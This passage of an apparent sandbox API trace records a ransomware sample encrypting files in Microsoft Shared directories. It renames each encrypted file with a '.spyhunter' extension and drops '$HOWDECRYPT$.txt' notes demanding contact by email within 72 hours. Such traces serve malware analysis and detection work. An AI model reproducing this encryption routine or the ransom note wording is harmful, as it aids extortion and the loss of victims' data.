[0090.970] GetProcessHeap () returned 0x2c0000 [0090.970] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34c8c0 | out: hHeap=0x2c0000) returned 1 [0090.970] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.970] WriteFile (in: hFile=0x15c, lpBuffer=0x25cfd94*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfd54, lpOverlapped=0x0 | out: lpBuffer=0x25cfd94*, lpNumberOfBytesWritten=0x25cfd54*=0x4, lpOverlapped=0x0) returned 1 [0090.970] WriteFile (in: hFile=0x15c, lpBuffer=0x320308*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfd54, lpOverlapped=0x0 | out: lpBuffer=0x320308*, lpNumberOfBytesWritten=0x25cfd54*=0x30, lpOverlapped=0x0) returned 1 [0090.970] CloseHandle (hObject=0x15c) returned 1 [0090.971] GetProcessHeap () returned 0x2c0000 [0090.971] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c20090 [0090.972] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\SPRING.ELM.spyhunter") returned 87 [0090.972] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\SPRING.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\spring.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\SPRING.ELM.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\spring.elm.spyhunter")) returned 1 [0090.972] GetProcessHeap () returned 0x2c0000 [0090.972] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c20090 | out: hHeap=0x2c0000) returned 1 [0090.972] GetProcessHeap () returned 0x2c0000 [0090.972] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0090.972] GetProcessHeap () returned 0x2c0000 [0090.972] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x377258 | out: hHeap=0x2c0000) returned 1 [0090.972] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfd98 | out: pbBuffer=0x25cfd98) returned 1 [0090.972] GetProcessHeap () returned 0x2c0000 [0090.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0090.973] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x25cfd90*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x25cfd90*=0x30) returned 1 [0090.973] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0090.973] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 78 [0090.973] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0090.973] GetProcessHeap () returned 0x2c0000 [0090.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x34c8c0 [0090.973] ReadFile (in: hFile=0x15c, lpBuffer=0x34c8c0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfd54, lpOverlapped=0x0 | out: lpBuffer=0x34c8c0*, lpNumberOfBytesRead=0x25cfd54*=0x9df, lpOverlapped=0x0) returned 1 [0090.993] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffff621, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.993] WriteFile (in: hFile=0x15c, lpBuffer=0x34c8c0*, nNumberOfBytesToWrite=0x9df, lpNumberOfBytesWritten=0x25cfd54, lpOverlapped=0x0 | out: lpBuffer=0x34c8c0*, lpNumberOfBytesWritten=0x25cfd54*=0x9df, lpOverlapped=0x0) returned 1 [0090.993] GetProcessHeap () returned 0x2c0000 [0090.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34c8c0 | out: hHeap=0x2c0000) returned 1 [0090.994] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.994] WriteFile (in: hFile=0x15c, lpBuffer=0x25cfd94*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfd54, lpOverlapped=0x0 | out: lpBuffer=0x25cfd94*, lpNumberOfBytesWritten=0x25cfd54*=0x4, lpOverlapped=0x0) returned 1 [0090.994] WriteFile (in: hFile=0x15c, lpBuffer=0x320308*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfd54, lpOverlapped=0x0 | out: lpBuffer=0x320308*, lpNumberOfBytesWritten=0x25cfd54*=0x30, lpOverlapped=0x0) returned 1 [0090.994] CloseHandle (hObject=0x15c) returned 1 [0090.995] GetProcessHeap () returned 0x2c0000 [0090.995] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3867e8 [0090.996] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF.spyhunter") returned 88 [0090.996] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\preview.gif.spyhunter")) returned 1 [0090.996] GetProcessHeap () returned 0x2c0000 [0090.996] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3867e8 | out: hHeap=0x2c0000) returned 1 [0090.996] GetProcessHeap () returned 0x2c0000 [0090.996] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0090.996] GetProcessHeap () returned 0x2c0000 [0090.996] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x377170 | out: hHeap=0x2c0000) returned 1 [0090.997] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfd90 | out: pbBuffer=0x25cfd90) returned 1 [0090.997] GetProcessHeap () returned 0x2c0000 [0090.997] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0090.997] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x25cfd88*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x25cfd88*=0x30) returned 1 [0090.997] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\STRTEDGE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\strtedge.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0090.997] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\STRTEDGE.ELM") returned 81 [0090.997] StrStrW (lpFirst="STRTEDGE.ELM", lpSrch=".txt") returned 0x0 [0090.997] GetProcessHeap () returned 0x2c0000 [0090.997] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c300d8 [0090.997] ReadFile (in: hFile=0x15c, lpBuffer=0x2c300d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfd4c, lpOverlapped=0x0 | out: lpBuffer=0x2c300d8*, lpNumberOfBytesRead=0x25cfd4c*=0x2800, lpOverlapped=0x0) returned 1 [0091.021] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.021] WriteFile (in: hFile=0x15c, lpBuffer=0x2c300d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfd4c, lpOverlapped=0x0 | out: lpBuffer=0x2c300d8*, lpNumberOfBytesWritten=0x25cfd4c*=0x2800, lpOverlapped=0x0) returned 1 [0091.022] GetProcessHeap () returned 0x2c0000 [0091.022] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c300d8 | out: hHeap=0x2c0000) returned 1 [0091.022] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.022] WriteFile (in: hFile=0x15c, lpBuffer=0x25cfd8c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfd4c, lpOverlapped=0x0 | out: lpBuffer=0x25cfd8c*, lpNumberOfBytesWritten=0x25cfd4c*=0x4, lpOverlapped=0x0) returned 1 [0091.044] WriteFile (in: hFile=0x15c, lpBuffer=0x320308*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfd4c, lpOverlapped=0x0 | out: lpBuffer=0x320308*, lpNumberOfBytesWritten=0x25cfd4c*=0x30, lpOverlapped=0x0) returned 1 [0091.044] CloseHandle (hObject=0x15c) returned 1 [0091.046] GetProcessHeap () returned 0x2c0000 [0091.046] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0091.046] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\STRTEDGE.ELM.spyhunter") returned 91 [0091.047] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\STRTEDGE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\strtedge.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\STRTEDGE.ELM.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\strtedge.elm.spyhunter")) returned 1 [0091.048] GetProcessHeap () returned 0x2c0000 [0091.048] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c10048 | out: hHeap=0x2c0000) returned 1 [0091.048] GetProcessHeap () returned 0x2c0000 [0091.048] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0091.048] GetProcessHeap () returned 0x2c0000 [0091.048] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3414b0 | out: hHeap=0x2c0000) returned 1 [0091.048] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0091.049] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0091.049] WriteFile (in: hFile=0x15c, lpBuffer=0x25cfcc3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cfdec, lpOverlapped=0x0 | out: lpBuffer=0x25cfcc3*, lpNumberOfBytesWritten=0x25cfdec*=0x127, lpOverlapped=0x0) returned 1 [0091.060] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0091.060] WriteFile (in: hFile=0x15c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cfdec, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cfdec*=0x2ac, lpOverlapped=0x0) returned 1 [0091.060] CloseHandle (hObject=0x15c) returned 1 [0091.061] GetProcessHeap () returned 0x2c0000 [0091.061] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3775f8 | out: hHeap=0x2c0000) returned 1 [0091.061] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\watermar\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0091.093] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0091.093] WriteFile (in: hFile=0x15c, lpBuffer=0x25cfcbf*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cfde8, lpOverlapped=0x0 | out: lpBuffer=0x25cfcbf*, lpNumberOfBytesWritten=0x25cfde8*=0x127, lpOverlapped=0x0) returned 1 [0091.093] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0091.093] WriteFile (in: hFile=0x15c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cfde8, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cfde8*=0x2ac, lpOverlapped=0x0) returned 1 [0091.094] CloseHandle (hObject=0x15c) returned 1 [0091.094] GetProcessHeap () returned 0x2c0000 [0091.094] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3553b0 | out: hHeap=0x2c0000) returned 1 [0091.094] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ESEN\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\esen\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0091.122] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0091.122] WriteFile (in: hFile=0x15c, lpBuffer=0x25cfcbb*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cfde4, lpOverlapped=0x0 | out: lpBuffer=0x25cfcbb*, lpNumberOfBytesWritten=0x25cfde4*=0x127, lpOverlapped=0x0) returned 1 [0091.123] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0091.123] WriteFile (in: hFile=0x15c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cfde4, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cfde4*=0x2ac, lpOverlapped=0x0) returned 1 [0091.123] CloseHandle (hObject=0x15c) returned 1 [0091.123] GetProcessHeap () returned 0x2c0000 [0091.123] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34e8d8 | out: hHeap=0x2c0000) returned 1 [0091.124] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0091.124] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0091.124] WriteFile (in: hFile=0x15c, lpBuffer=0x25cfcb7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cfde0, lpOverlapped=0x0 | out: lpBuffer=0x25cfcb7*, lpNumberOfBytesWritten=0x25cfde0*=0x127, lpOverlapped=0x0) returned 1 [0091.125] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0091.125] WriteFile (in: hFile=0x15c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cfde0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cfde0*=0x2ac, lpOverlapped=0x0) returned 1 [0091.125] CloseHandle (hObject=0x15c) returned 1 [0091.125] GetProcessHeap () returned 0x2c0000 [0091.125] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x377428 | out: hHeap=0x2c0000) returned 1 [0091.125] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfd80 | out: pbBuffer=0x25cfd80) returned 1 [0091.125] GetProcessHeap () returned 0x2c0000 [0091.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x320308 [0091.125] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x320308*, pdwDataLen=0x25cfd78*=0x20, dwBufLen=0x30 | out: pbData=0x320308*, pdwDataLen=0x25cfd78*=0x30) returned 1 [0091.125] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1XTOR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\msb1xtor.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0091.150] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1XTOR.DLL") returned 72 [0091.150] StrStrW (lpFirst="MSB1XTOR.DLL", lpSrch=".txt") returned 0x0 [0091.150] GetProcessHeap () returned 0x2c0000 [0091.150] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c300d8 [0091.150] ReadFile (in: hFile=0x17c, lpBuffer=0x2c300d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfd3c, lpOverlapped=0x0 | out: lpBuffer=0x2c300d8*, lpNumberOfBytesRead=0x25cfd3c*=0x2800, lpOverlapped=0x0) returned 1 [0091.238] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.238] WriteFile (in: hFile=0x17c, lpBuffer=0x2c300d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfd3c, lpOverlapped=0x0 | out: lpBuffer=0x2c300d8*, lpNumberOfBytesWritten=0x25cfd3c*=0x2800, lpOverlapped=0x0) returned 1 [0091.238] GetProcessHeap () returned 0x2c0000 [0091.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c300d8 | out: hHeap=0x2c0000) returned 1 [0091.238] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.238] WriteFile (in: hFile=0x17c, lpBuffer=0x25cfd7c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfd3c, lpOverlapped=0x0 | out: lpBuffer=0x25cfd7c*, lpNumberOfBytesWritten=0x25cfd3c*=0x4, lpOverlapped=0x0) returned 1 [0091.264] WriteFile (in: hFile=0x17c, lpBuffer=0x320308*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfd3c, lpOverlapped=0x0 | out: lpBuffer=0x320308*, lpNumberOfBytesWritten=0x25cfd3c*=0x30, lpOverlapped=0x0) returned 1 [0091.264] CloseHandle (hObject=0x17c) returned 1 [0091.265] GetProcessHeap () returned 0x2c0000 [0091.265] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0091.267] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1XTOR.DLL.spyhunter") returned 82 [0091.267] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1XTOR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\msb1xtor.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\MSB1XTOR.DLL.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\msb1xtor.dll.spyhunter")) returned 1 [0091.267] GetProcessHeap () returned 0x2c0000 [0091.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c10048 | out: hHeap=0x2c0000) returned 1 [0091.267] GetProcessHeap () returned 0x2c0000 [0091.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x320308 | out: hHeap=0x2c0000) returned 1 [0091.267] GetProcessHeap () returned 0x2c0000 [0091.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346808 | out: hHeap=0x2c0000) returned 1 [0091.268] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0091.269] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0091.269] WriteFile (in: hFile=0x17c, lpBuffer=0x25cfcaf*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cfdd8, lpOverlapped=0x0 | out: lpBuffer=0x25cfcaf*, lpNumberOfBytesWritten=0x25cfdd8*=0x127, lpOverlapped=0x0) returned 1 [0091.270] lstrlenA 